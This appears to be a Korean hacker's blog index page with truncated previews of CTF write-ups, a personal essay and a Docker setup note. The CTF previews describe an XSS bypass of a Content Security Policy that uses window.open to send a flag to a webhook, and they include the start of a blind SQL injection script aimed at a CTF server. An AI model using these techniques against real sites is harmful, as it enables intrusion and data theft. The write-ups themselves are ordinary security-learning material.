LittleDev

https://velog.io/@oriu9ri/CCE-Final-Writeup CCE Final 후기 😄공공부문 2등으로 마무리한 CCE WRITEUP ~!! Jeopardy 2086 점 + Live Fire 2010 점으로 2**12 점을 달성하며 공공 2위 총 6위를 기록했다. 나는velog.io

https://velog.io/@oriu9ri/2024-FIESTA-CTF 2024 FIESTA CTF규로롱~규로롱 팀(진우/matty/deayzl/나) 으로 막~ 풀다가 4문젠가 남기고 스코어보드가 저래 되었길래 123 등이 올솔한걸로 알고 놨다.피에스타 대회는 다른 대회와 다르게 시나리오 형식 중점으로velog.io 10.4 ~ 10.6 에 열렸던 삐에스타 대회 풀이를 드디어 올린다 작년에 운좋게 3등으로 상탔는데 올해는 6등으로 마무리됐다.4문제를 남기고 잠을 자러가고 점호받고 보니까 123등이 같은 점수길래 올솔이구나 하고 놔줬다. ㅋㅋ

추구하는 인간상 : 변화 가능한 사고 모델을 가진 사람. - 사고 모델 세상 속 사람들은 태어난 후로 각자 환경에 따라 만들어진 본인만의 뇌 속 사고 모델이 있다. 오감이 받아들인 주변의 정보들은 이 사고 모델에 입력되어 어떤 행동을 할지 출력으로 이어진다. 어떤 상황에서 어떻게 행동할지 사람들마다 달라지고 이는 개개인의 성격으로 불린다. 나의 경험상 이 사고 모델은 유아기와 청소년기에 가장 많은 변화가 일어나고 이후로 차츰 굳게 되는 것 같다. 사고 모델에 강한 영향을 주는 사람은 유아기 때는 부모와 형제, 청소년기에는 학교 친구들일 것이다. 청소년기가 지나면 자기가 무엇을 좋아하고 무엇을 싫어한다 라고 생각하며 생각을 굳힌다. 자신을 틀 안에 넣고 '난 원래 이런 사람이야' 정해버린다. MBTI 도 ..

티스토리는 오늘부로 나의 안방이 되었다.컴퓨터 이외의 것들로 채워놓을 방물론 안방에도 컴퓨터 관련된 생각들은 널부러져 있다.하지만 문제 풀이와 같은 결로는 안 느껴지기에 문제 풀이나 기술적 내용들은 velog 에 올릴 예정이다. https://velog.io/@oriu9ri/ oriu9ri (ORIU9RI) / 작성글 - velog velog.io 오리너구리 벨로그를 새로 팠다.  티스토리에서는 이제 누워있어야겠다.

docker pull jumpserver/guacddocker pull guacamole/guacamoledocker pull mysqldocker run --name some-guacd -d jumpserver/guacddocker run --name docker-mysql -e MYSQL_ROOT_PASSWORD= -d -p 3306:3306 mysql:latestdocker run --rm guacamole/guacamole /opt/guacamole/bin/initdb.sh --postgres > initdb.sqldocker cp initdb.sql docker-mysql:/docker exec -it mysql-container bashmysql -u root -pCREATE DATABASE ..

보호되어 있는 글입니다.

1. Loogle - rev / 986 pts음 문제 정적분석하다가 4시간 날려먹고 이리저리 동적분석해가면서 풀었다 database 폴더 내에 위처럼 파일이 4개가 저장되어있다. 저장 방식은 각 문서에 나오는 단어들을 rev_index_table에 쭉 저장하는데, 각 단어가 몇번째 문서에 몇번 나오는지가 저장되어있다.위 단어들이 각 문서에 있는데, henagon 부터 icosadecagon 까지는 총 22006개의 문서에 수십개에서 수백개씩 모두 들어가있다. 플래그에 해당하는 단어들은 20000 문서부터 20005 문서까지 저장되어 있다. 그리고 nc 서버가 열려있는데 서버에서는 search 바이너리가 실행되어서 문서를 검색할 수 있게 한다. cpp이지만 다행히 strip까지는 안되어있어서 아래처럼 생성..

2023.11.26 HSpace CTF - seeds import random flag = "hspace{}" random.seed(bytes.fromhex(input("hex seed> "))) cache = random.getrandbits(50000) random.seed(int(input("int seed> "))) assert cache == random.getrandbits(50000) print(flag) seed를 bytes와 int 로 각각 설정하는데 같은 시드인 것처럼 동작해야한다. python seed 코드를 확인해보면 https://github.com/python/cpython/blob/main/Lib/random.py#L167C32-L167C32 seed 가 bytes 인 경우 i..

2023.11.25 - Incognito 2023 CTF - babysrc 단순 XSS 문제인데 다음의 조건이 있따. 1. CSP - default-src, unsafe-inline 2. xss 로 post(/flag) -> res -> get(hook) unsafe-inline 이 허용되어서 script 태그처럼 js 코드를 실행시킬 수는 있는데, default-src 에 connect-src 가 포함되어 있어서 fetch, xhr 등으로 /flag 나 웹훅 사이트에 리퀘를 못 날린다. 다른 CTF 에서도 이러한 유형의 문제를 만나고 해결하지 못한 경험이 많은데 이번에 해결하였다 window.open 으로 원하는 주소에 접근할 수 있고 이는 CSP 에 걸리지 않아 이것을 이용하면 된다. 특이한 것은 P..

평소 sqli 문제는 잘 못 풀었었는데 이제 어느정도 감 잡은 것 같다. blind sqli 코드 재활용을 위해 남긴다 from requests import * URL = 'http://54.180.124.188:8010/' for k in range(1): print('*'*10) s = [] for j in range(40): # print('asdf') start = 0 end = 255 for i in range(30): bs = (start + end) // 2 # print(bs, start, end) password = '12345678' username = f"' or (select case when ord(substr(s.column_name, {j+1}, 1)) >= {bs} then ..